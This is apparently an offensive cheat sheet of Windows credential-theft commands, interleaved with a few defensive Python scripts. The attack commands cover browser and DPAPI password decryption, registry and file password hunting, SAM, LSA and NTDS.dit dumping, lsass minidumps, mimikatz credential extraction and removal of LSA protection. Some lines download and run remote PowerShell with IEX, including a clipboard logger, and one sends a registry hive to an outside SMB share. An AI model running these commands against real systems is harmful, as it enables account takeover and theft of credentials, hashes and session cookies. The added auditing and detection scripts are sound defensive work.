# Credentials Attacks On Windows

## Web Credentials

```powershell
PS C:\> start lazagne.exe all
PS C:\> .\SharpChrome.exe logins /unprotect

PS C:\> vaultcmd /list
PS C:\> vaultcmd /listcreds:"Web Credentials" /all

#-----------EDGE---------------------------------
#Extract credentials from the Edge browser
PS C:\> (Get-Content "C:\Users\john.Ford\AppData\Local\Microsoft\Edge\User Data\Local State" | ConvertFrom-Json).os_crypt.encrypted_key
mimikatz dpapi::chrome /in:"C:\Users\john.Ford\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" /encryptedkey:<SNIP>e4x8+n0VDX82CffsyVmOzvSraXQ== /unprotect

#-----------Firefox-------------------------------
#Extract passwords from Mozilla Firefox profiles
Intrusionz3r0@htb[/htb]$ python firefox_decrypt.py /folder/containing/profiles.ini/

#Cookies
#Path: %APPDATA%\Mozilla\Firefox\Profiles\<RANDOM>.default-release
Intrusionz3r0@htb[/htb]$ python3 cookieextractor.py --dbpath "cookies.sqlite" --host slack --cookie d

#---------Chromium--------------------------------
PS C:\> (Get-Content "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State" | ConvertFrom-Json).os_crypt.encrypted_key
mimikatz dpapi::chrome /in:"%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data" /encryptedkey:[EncryptedKey] /unprotect

#Cookies
#Path: %LOCALAPPDATA%\Google\Chrome\User Data\Default\Network\Cookies
PS C:\> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1')
PS C:\> copy "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
PS C:\> Invoke-SharpChromium -Command "cookies slack.com"
```

## Credentials manager

```powershell
#Listing saved credentials
PS C:\> cmdkey /list

#Enumerate Windows credentials
PS C:\> vaultcmd /listcreds:"Windows Credentials" /all

C:\Temp> SharpDPAPI.exe machinecredentials

#Locate the credential store: credential blobs live under %APPDATA%\Microsoft\Credentials,
#the DPAPI master keys that protect them are GUID-named files under the user's SID folder, e.g.
#C:\Users\<user>\AppData\Roaming\Microsoft\Protect\S-1-5-21-14879826xxx-1x9x5x7x3-2x8x2x6x9x-xxxx\556a2412-xxxx-4ccf-b721-e6a0b4f90407

#1. Decrypt the master key with the user's password
mimikatz "dpapi::masterkey /in:C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-14879826xxx-1x9x5x7x3-2x8x2x6x9x-xxxx\556a2412-xxxx-4ccf-b721-e6a0b4f90407 /password:MYPASSWORD123 /protected" exit

#2. Decrypt the credential blob with the recovered master key
mimikatz "dpapi::cred /in:C:\Users\user\AppData\Roaming\Microsoft\Credentials\C8XXXXXXXXXXXXXXXXXXXXXXXX1B9 /masterkey:d9a<SNIP>f319e9c84" exit
```

## DPAPI

```sh
#Using DonPAPI (best option)
donpapi collect -u 'John.ford' -H 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' --collectors All --target vdixx.eu-xxxx.vl -d eu-xxxx.vl --dc-ip xx.xx.xx.xx

#Using netexec
Intrusionz3r0@htb[/htb]$ nxc smb <ip> -u user -p password --dpapi
Intrusionz3r0@htb[/htb]$ nxc smb <ip> -u user -p password --dpapi cookies
Intrusionz3r0@htb[/htb]$ nxc smb <ip> -u user -p password --dpapi nosystem
Intrusionz3r0@htb[/htb]$ nxc smb <ip> -u user -p password --local-auth --dpapi nosystem
```

## Search Credentials

### Extract credentials using SessionGopher

```powershell
PS C:\htb> Import-Module .\SessionGopher.ps1
PS C:\Tools> Invoke-SessionGopher -Target WINLPE-SRV01
```

### Sniff passwords and hashes with net-creds

```sh
Intrusionz3r0@htb[/htb]$ sudo python net-creds.py
Intrusionz3r0@htb[/htb]$ sudo python net-creds.py -i eth0
```

### Search credentials on the registry

```powershell
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" # Windows autologon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # PuTTY clear text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```
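The `reg query` lines above find credentials by string match; the defender-side counterpart is to parse the same output and decide whether what is there is actually a problem. The following Python script is an added example, not part of the original page or of any tool it references: it parses `reg query` output for the Winlogon key (the sample output is constructed, and the function names are mine) and flags an autologon password stored as a cleartext `REG_SZ` `DefaultPassword`, which any local user can read. Sysinternals Autologon instead stores the password in the `DefaultPassword` LSA secret, readable only with SYSTEM or administrative rights, which is what the `info` finding points at.

```python
import re

# Constructed `reg query` output (not from the page): a kiosk account with
# autologon configured the insecure way, i.e. the password in a REG_SZ value.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    svc_kiosk
    DefaultDomainName    REG_SZ    CORP
    DefaultPassword    REG_SZ    Spring2024!
    Shell    REG_SZ    explorer.exe
"""


def parse_reg_query(text):
    """Parse `reg query` output into {key_path: {value_name: (type, data)}}.
    Key paths are the non-indented lines; values are indented and separated
    by runs of spaces, with the data (which may itself contain spaces) last."""
    keys, current = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():
            current = line.strip()
            keys[current] = {}
            continue
        parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)
        if current is None or len(parts) < 2:
            continue
        name, vtype = parts[0], parts[1]
        data = parts[2] if len(parts) == 3 else ""
        keys[current][name] = (vtype, data)
    return keys


def audit_autologon(keys):
    """Return findings for every Winlogon key in the parsed output."""
    findings = []
    for path, values in keys.items():
        if not path.lower().endswith(r"\winlogon"):
            continue
        enabled = values.get("AutoAdminLogon", ("REG_SZ", "0"))[1].strip() == "1"
        user = values.get("DefaultUserName", ("", ""))[1]
        domain = values.get("DefaultDomainName", ("", ""))[1]
        account = f"{domain}\\{user}" if domain else user
        if "DefaultPassword" in values:
            # The Winlogon key is readable by standard users, so this is a
            # cleartext credential exposed to every local account.
            findings.append({"severity": "high", "account": account,
                             "autologon_enabled": enabled,
                             "issue": "DefaultPassword stored as cleartext REG_SZ under Winlogon"})
        elif enabled:
            findings.append({"severity": "info", "account": account,
                             "autologon_enabled": True,
                             "issue": "autologon enabled; password is held in the DefaultPassword LSA secret"})
    return findings


if __name__ == "__main__":
    for finding in audit_autologon(parse_reg_query(SAMPLE_REG_OUTPUT)):
        print(finding)
```

The parser is deliberately tolerant of values without data (such as `(Default)`), so the same function can be pointed at the output of the broader `reg query HKLM /f password /t REG_SZ /s` sweep.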

### Search for file contents

```powershell
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt
findstr /spin "password" *.*
dir | select-string "password"
PS C:\htb> Get-ChildItem -Path C:\PSTranscripts -Force -Recurse -Include *.txt, *.cfg, *.conf, *.xml, *.ini -Exclude "Windows","Documents*", "Program F*" -ErrorAction SilentlyContinue
PS C:\htb> Get-ChildItem -Path "C:\Users" -Recurse -File | Select-String -Pattern "password" | Select-Object FileName, LineNumber, Line
```

### Search for filename

```powershell
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
C:\htb> dir \confidentials.txt /s /p
PS C:\htb> Get-ChildItem -Path C:\ -Filter "confidentials.txt" -Recurse
```

### Passwords in unattend.xml

```sh
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
```
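Answer files at the paths above are a common leftover from imaging. As an added example (not from the page; the sample XML is constructed and the function names are mine), this Python script walks an unattend.xml, reports every `Password`/`AdministratorPassword` element that carries a value, and distinguishes `PlainText=true` values from the form Windows Setup writes when `PlainText=false`: base64 of the UTF-16LE password with the string `Password` appended, which is obfuscation rather than encryption. It reports only location and password length, so it can be run across a fleet without copying secrets into the report.

```python
import base64
import xml.etree.ElementTree as ET


def _local(tag):
    """Strip the XML namespace prefix from an ElementTree tag."""
    return tag.rsplit("}", 1)[-1]


def _child_text(elem, name):
    """Text of the first direct child called `name`, or None."""
    for child in elem:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return None


def setup_password_length(value):
    """Windows Setup stores a non-PlainText answer-file password as base64 of
    the UTF-16LE password followed by the literal word 'Password'. Return the
    real password's length if `value` is in that format, else None. The
    password itself is deliberately not returned."""
    try:
        decoded = base64.b64decode(value, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None
    if not decoded.endswith("Password"):
        return None
    return len(decoded) - len("Password")


def scan_unattend(xml_text):
    """One finding per <Password>/<AdministratorPassword> element with a <Value>."""
    root = ET.fromstring(xml_text)
    parent = {child: p for p in root.iter() for child in p}
    findings = []
    for elem in root.iter():
        if _local(elem.tag) not in ("Password", "AdministratorPassword"):
            continue
        value = _child_text(elem, "Value")
        if not value:
            continue
        # PlainText defaults to true when the element is absent
        plain = (_child_text(elem, "PlainText") or "true").lower() == "true"
        path, node = [], elem
        while node is not None:
            path.append(_local(node.tag))
            node = parent.get(node)
        location = "/".join(reversed(path))
        if plain:
            findings.append({"location": location, "encoding": "plaintext",
                             "password_length": len(value)})
        else:
            length = setup_password_length(value)
            findings.append({"location": location,
                             "encoding": "base64-obfuscated" if length is not None else "unknown",
                             "password_length": length})
    return findings


# Constructed sample answer file (not from the page): an AutoLogon password in the
# obfuscated form and a local Administrator password left in plain text.
_OBFUSCATED = base64.b64encode("P@ssw0rd123Password".encode("utf-16-le")).decode("ascii")
SAMPLE_UNATTEND = f"""<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password><Value>{_OBFUSCATED}</Value><PlainText>false</PlainText></Password>
        <Username>deploy</Username>
        <Enabled>true</Enabled>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword><Value>Winter2024!</Value><PlainText>true</PlainText></AdministratorPassword>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"""

if __name__ == "__main__":
    for finding in scan_unattend(SAMPLE_UNATTEND):
        print(finding)
```

To scan a real file, pass `open(path, encoding="utf-8-sig").read()` to `scan_unattend`; the `unknown` encoding result means a `PlainText=false` value that is not in Setup's format and deserves a manual look.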

### Retrieve Putty Credentials from registry

```powershell
PS C:\htb> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions
PS C:\htb> reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\<value>
```

## PowerShell

### Powershell History File

```powershell
#%userprofile% only expands in cmd.exe; from PowerShell use $env:APPDATA as below
C:\> type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
PS C:\> type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
PS C:\> type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS C:\> cat (Get-PSReadlineOption).HistorySavePath
```

### Powershell Transcript

```powershell
PS C:\> gc C:\Users\<USERNAME>\Documents\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt
PS C:\> gc C:\Transcripts\<DATE>\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt
```
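Both the PSReadLine history file and the transcript files above are plain text, so the same scan tells a defender which users have typed secrets on the command line. The following Python script is an added example, not part of the original page: a small rule set (regexes for `net user ... /add`, `ConvertTo-SecureString -AsPlainText`, `cmdkey /pass:`, `-Password` arguments and `password=` connection strings) run over constructed sample lines, with the matched secret redacted in the report. `scan_file` points the same rules at a real history or transcript file.

```python
import re

# Each rule: name, regex with a named group `secret` that is redacted in the report.
SECRET_RULES = [
    ("net-user-add",
     re.compile(r"\bnet\s+user\s+\S+\s+(?P<secret>\S+)\s+/add\b", re.IGNORECASE)),
    ("securestring-plaintext",
     re.compile(r"ConvertTo-SecureString\b(?=.*-AsPlainText).*?(?P<secret>'[^']*'|\"[^\"]*\")",
                re.IGNORECASE)),
    ("cmdkey-pass",
     re.compile(r"\bcmdkey\b.*?/pass:(?P<secret>\S+)", re.IGNORECASE)),
    ("password-parameter",
     # a literal argument only; -Password $var or -Password (Get-...) is not a leak
     re.compile(r"-Password\s+(?![$(])(?P<secret>'[^']*'|\"[^\"]*\"|\S+)", re.IGNORECASE)),
    ("connection-string",
     re.compile(r"\b(?:password|pwd)\s*=\s*(?P<secret>[^;'\"\s]+)", re.IGNORECASE)),
]


def scan_lines(lines):
    """Return (line_number, rule_name, redacted_line) for every line/rule match."""
    findings = []
    for number, line in enumerate(lines, start=1):
        for rule_name, pattern in SECRET_RULES:
            match = pattern.search(line)
            if match:
                redacted = line[:match.start("secret")] + "<redacted>" + line[match.end("secret"):]
                findings.append((number, rule_name, redacted))
    return findings


def scan_file(path):
    """Scan a ConsoleHost_history.txt or PowerShell_transcript.*.txt file on disk.
    utf-8-sig handles both BOM-prefixed transcripts and plain UTF-8 history files."""
    with open(path, encoding="utf-8-sig", errors="replace") as handle:
        return scan_lines(handle.read().splitlines())


# Constructed sample lines (not from the page): a mix of history entries and
# transcript-style echoed commands.
SAMPLE_LINES = [
    r"Get-ChildItem C:\Users",
    "net user svc_backup Autumn2023! /add",
    "$p = ConvertTo-SecureString 'Winter2024!' -AsPlainText -Force",
    "Invoke-WebRequest -Uri http://files.corp.local/setup.ps1 -OutFile setup.ps1",
    r"cmdkey /add:fileserver /user:CORP\jdoe /pass:Summer2024!",
    "Get-Process lsass",
    r"PS C:\Users\jdoe> Invoke-Sqlcmd -ConnectionString 'Server=db01;User Id=sa;Password=Sa!2024;' -Query 'SELECT 1'",
]

if __name__ == "__main__":
    for number, rule_name, redacted in scan_lines(SAMPLE_LINES):
        print(f"line {number}: {rule_name}: {redacted}")
```

The rules are anchored on the command, not on a prompt prefix, so transcript lines that echo `PS C:\...>` before the command match the same way as raw history entries.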

### Recover credentials from PowerShell scripts

**First option:**

```powershell
PS C:\htb> $credential = Import-Clixml -Path 'C:\scripts\pass.xml'
PS C:\htb> $credential.GetNetworkCredential().username
PS C:\htb> $credential.GetNetworkCredential().password
Str0ng3ncryptedP@ss!
```

**Second option:**

```powershell
PS C:\> $user = "Administrator"
PS C:\> $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d4ecf9dfb12aed4eab72b909047c4e560000000002000000000003660000c000000010000000d5ad4244981a04676e2b522e24a5e8000000000004800000a00000001000000072cd97a471d9d6379c6d8563145c9c0e48000000f31b15696fdcdfdedc9d50e1f4b83dda7f36bde64dcfb8dfe8e6d4ec059cfc3cc87fa7d7898bf28cb02352514f31ed2fb44ec44b40ef196b143cfb28ac7eff5f85c131798cb77da914000000e43aa04d2437278439a9f7f4b812ad3776345367" | ConvertTo-SecureString
PS C:\> $cred = New-Object System.Management.Automation.PSCredential($user, $pass)
PS C:\> $cred.GetNetworkCredential() | Format-List
```

## Alternate Data Stream

### Retrieve Credentials on data streams

```powershell
PS > Get-Item -path flag.txt -Stream *
PS > Get-Content -path flag.txt -Stream Flag
```

## Clipboard

### Monitor Clipboard

```powershell
PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/inguardians/Invoke-Clipboard/master/Invoke-Clipboard.ps1')
PS C:\htb> Invoke-ClipboardLogger
```

## **Sensitive Files**

### IIS Web config

```powershell
PS C:\> Get-ChildItem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
```

### Retrieve password from Wireless

```powershell
C:\htb> netsh wlan show profile
C:\htb> netsh wlan show profile <ssid-name> key=clear

cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
```

## Sticky notes

```powershell
#Path: C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
Intrusionz3r0@htb[/htb]$ sqlite3 plum.sqlite "select Text from Note;"
Intrusionz3r0@htb[/htb]$ strings plum.sqlite-wal

PS C:\htb> Set-ExecutionPolicy Bypass -Scope Process
PS C:\htb> cd .\PSSQLite\
PS C:\htb> Import-Module .\PSSQLite.psd1
PS C:\htb> $db = 'C:\Users\htb-student\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
PS C:\htb> Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap
```

### Copying SAM, SYSTEM and SECURITY

```powershell
C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save
C:\WINDOWS\system32> reg.exe save hklm\system C:\system.save
C:\WINDOWS\system32> reg.exe save hklm\security C:\security.save
```

### Dumping SAM and SYSTEM

```bash
Intrusionz3r0X@htb[/htb]$ impacket-reg domain/domuser:'Password'@192.168.210.16 save -keyName 'HKLM\SYSTEM' -o '\\10.10.14.3\smbfolder'
Intrusionz3r0X@htb[/htb]$ impacket-secretsdump -sam sam.save -system system.save LOCAL
Intrusionz3r0X@htb[/htb]$ netexec smb 10.129.202.85 -u jmarston -p P@ssword! --sam
```

### Dump LSA

```bash
Intrusionz3r0X@htb[/htb]$ netexec smb 10.129.202.85 -u jmarston -p P@ssword! --lsa
```

### Dump lsass

```bash
#Find the LSASS PID from cmd
C:\Windows\system32> tasklist /svc

#Find the LSASS PID from PowerShell
PS C:\Windows\system32> Get-Process lsass
#----------------------------------------

#Create the lsass dump file (672 is the PID found above)
PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full

#Parse the lsass.dmp file offline
Intrusionz3r0X@htb[/htb]$ pypykatz lsa minidump /home/peter/Documents/lsass.dmp
C:\Windows\system32> .\mimikatz.exe privilege::debug "sekurlsa::logonpasswords full" exit
```
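The MiniDump and `sekurlsa::logonpasswords` steps above both need a handle to lsass.exe with read access to its memory, which is exactly what Sysmon Event ID 10 (ProcessAccess) records when it is configured to log accesses with `TargetImage` lsass.exe. As an added example that is not part of the page (the events are constructed; the field names follow the Sysmon schema, the thresholds and allowlist are mine), this Python classifier flags handles that include `PROCESS_VM_READ` (0x0010) from non-core processes, raising severity when the call trace passes through comsvcs.dll, dbghelp.dll or dbgcore.dll (the libraries that implement MiniDumpWriteDump) or when `PROCESS_ALL_ACCESS` (0x1FFFFF) was granted; query-only handles such as 0x1000 are ignored as routine.

```python
PROCESS_VM_READ = 0x0010          # required to read another process's memory
PROCESS_ALL_ACCESS = 0x1FFFFF
# Libraries that implement MiniDumpWriteDump; seeing them in the call trace of an
# lsass access is a strong sign of a memory dump in progress.
DUMP_LIBRARIES = ("comsvcs.dll", "dbghelp.dll", "dbgcore.dll")
# Core Windows processes that legitimately hold broad handles to lsass. Matching
# is by full path, so a renamed binary in a user-writable folder never lands here.
BENIGN_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
}


def classify_lsass_access(event):
    """Return 'high', 'medium' or None for one Sysmon ProcessAccess (Event ID 10) record."""
    if event.get("EventID") != 10:
        return None
    if not event.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return None
    access = int(event.get("GrantedAccess", "0x0"), 16)
    if not access & PROCESS_VM_READ:
        return None                     # query-only handles (0x1000, 0x1400) are routine
    source = event.get("SourceImage", "").lower()
    if source in BENIGN_SOURCES:
        return None
    trace = event.get("CallTrace", "").lower()
    if any(lib in trace for lib in DUMP_LIBRARIES) or access == PROCESS_ALL_ACCESS:
        return "high"
    return "medium"


def detect_lsass_access(events):
    """Run the classifier over a batch of events and return the suspicious ones."""
    hits = []
    for index, event in enumerate(events):
        severity = classify_lsass_access(event)
        if severity:
            hits.append({"index": index, "severity": severity,
                         "source": event.get("SourceImage", ""),
                         "access": event.get("GrantedAccess", "")})
    return hits


# Constructed sample events (not real telemetry): field names follow the Sysmon
# Event ID 10 schema, all values are made up.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d204"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\rundll32.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d204|C:\Windows\System32\comsvcs.dll+2e8a0"},
    {"EventID": 10, "SourceImage": r"C:\Users\jdoe\Desktop\tool.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d204|UNKNOWN(0000000140021A2B)"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d204"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for hit in detect_lsass_access(SAMPLE_EVENTS):
        print(hit)
```

On real telemetry the allowlist has to be tuned for the environment's EDR and antivirus engines, which also open lsass with read access; the value of the classifier is that it separates those few known full-path sources from a rundll32 or an unsigned binary on a user's desktop doing the same thing.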

#### Dump lsass using RDP session


### Dump NTDS.dit

To copy the NTDS.dit file we need local admin rights on the domain controller (`Administrators` group), Domain Admin rights (`Domain Admins` group), or equivalent.

```bash
#List the local groups
C:\> net localgroup

#Check the user's group membership
C:\> net user bwilliamson

#Create a shadow copy of the C: volume
C:\> vssadmin CREATE SHADOW /For=C:

#Copy NTDS.dit out of the shadow copy
C:\> cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

#Extract credentials from NTDS.dit with DSInternals
PS C:\htb> Import-Module .\DSInternals.psd1
PS C:\htb> $key = Get-BootKey -SystemHivePath .\SYSTEM
PS C:\htb> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key

#Extract hashes using secretsdump
Intrusionz3r0@htb[/htb]$ secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

#Fastest way to grab the NTDS
Intrusionz3r0X@htb[/htb]$ crackmapexec smb 10.129.201.57 -u bwilliamson -p P@55w0rd! --ntds
```

## Mimikatz

```sh
# Dump the local SAM database
mimikatz lsadump::sam

# Dump LSA
mimikatz lsadump::lsa /inject

# Dump LSA secrets
mimikatz lsadump::secrets

# Dump the logon passwords
mimikatz sekurlsa::logonpasswords

# Dump the encryption keys used by Kerberos
mimikatz sekurlsa::ekeys

# Dump domain cached credentials
mimikatz lsadump::cache

# Dump domain trust keys
mimikatz lsadump::trust /patch
```

#### Bypassing LSA protection

**Error:** `ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)`

```
!+
!processprotect /process:lsass.exe /remove
privilege::debug
sekurlsa::logonpasswords
```


